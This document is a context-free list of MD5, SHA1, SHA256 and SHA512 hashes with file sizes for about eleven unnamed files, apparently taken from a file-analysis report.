MD5: 6752a1d65b201c13b62ea44016eb221f
SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Filesize: 11KB
MD5: bc1d8f47003fa00bbfc4c691bf624ceb
SHA1: 7991365fd011797a6812ddb60e95ca160aae6093
SHA256: f015e6ed70ad6f65fe3cba5620be34aef8f8264afaaf130e1685f52566c0fb88
SHA512: 370b8accb4ae8b6d4282b0dd4179f52d3769221a08728b7da4aaaf11293e89b651986315cbd315f81d847ea16bd4824fa5549c9a0d76c33e2d58e83802a4ee43

Filesize: 10KB
MD5: d15b341cda8598675a5da8b9cc64009a
SHA1: 4093e88736242f084f1b9db018de7fa5ec4ea1bb
SHA256: 7d986eb2e272257e4a605b956b2860f46353b9e8d5588c9f97400e76ac4b4384
SHA512: 23c49d7f4c024a8d8417c65e3f1135043bc054275dd879936572af5767fb4c08f1f42be00f3d87a19cbdef19425bd2986f59b71c0adfd136a0ec9c40888a3e3c

Filesize: 128KB
MD5: 4ab112b494b6c6762afb1be97cdc19f5
SHA1: eed9d960f86fb10da90d0bbca801aea021658f02
SHA256: ec778e79c7a3c88eed2a6931a9f188d209791f363fbe7eadf0842efdbfafee3e
SHA512: 4f7a92834c576fdb55c3a5dc4990c4aa719083ce64ebbb70139d03ba485e7ae0d249afdc6c9810ddae3d106a0bdfc35b8fddb4fb40ad692f21c5c8ce3bbb1b49

Filesize: 5.9MB
MD5: 463e7914d89b7dd1bfbba5b89c57eace
SHA1: 7f697f8880bcf0beed430d80487dd58b975073fa
SHA256: fd62ecf096773673d834f1ec598e0a3898a69c14bf159ba4e23b1caf5666923d
SHA512: a112d4b0fafaa273fcfa012cecb1aca93f6a352241064137ef8bfb0437f88683cec37f97cedce9cfc944228399e9e481e7be6a6f65b50d523014200974c87562

Filesize: 1KB
MD5: e77d2ff29ca99c3902d43b447c4039e2
SHA1: 2805268a8db128a7278239d82402c9db0a06e481
SHA256: 1afa31c6764bdb1d9d7e6c61bf7a6f2607fbc5061e7a0e5a56004694a2fd6f4c
SHA512: 580e3550c6751c58db5874eacde15aa80743625bf920d1191589c2aa7211896b378956dbe7070dcfe2f78a8028d92a8e6dceda8a8d2415b2600fc69f52833f2c

Filesize: 2KB
MD5: 33b75bd8dbb430e95c70d0265eeb911f
SHA1: 5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83
SHA256: 2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12
SHA512: 943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936

Filesize: 548KB
MD5: c1978e4080d1ec7e2edf49d6c9710045
SHA1: b6a87a32d80f6edf889e99fb47518e69435321ed
SHA256: c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8
SHA512: 2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e

Filesize: 19.0MB
MD5: a504846de42aa7e7b75541fa38987229
SHA1: 4c8ba5768db2412d57071071f8573b83ecab0e2d
SHA256: a20d339977ab7af573867a254ca2aaee4bcb296fa57cd1d3f1e7ed1c5855dc89
SHA512: 28b9f6a0783b82c4a28c52bc849a3886df7dac95be488253fc1ca5839600ac7ce79ef97f7da0a18d7474fe02748e7078bf4b823ced10c4dc0f8352fc7b1d7dea

Filesize: 26B
MD5: fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1: d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256: eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512: aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Filesize: 21.5MB
MD5: ac9526ec75362b14410cf9a29806eff4
SHA1: ef7c1b7181a9dc4e0a1c6b3804923b58500c263d
SHA256: 5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164
SHA512: 29514a83a5bb78439ee8fb9d64b9e0885f4444fb7f02cefdee939984bb80f58493b406787c53f9a4bf521b2c03af4c3e3da4d5033eee8095b2ab0e753534e621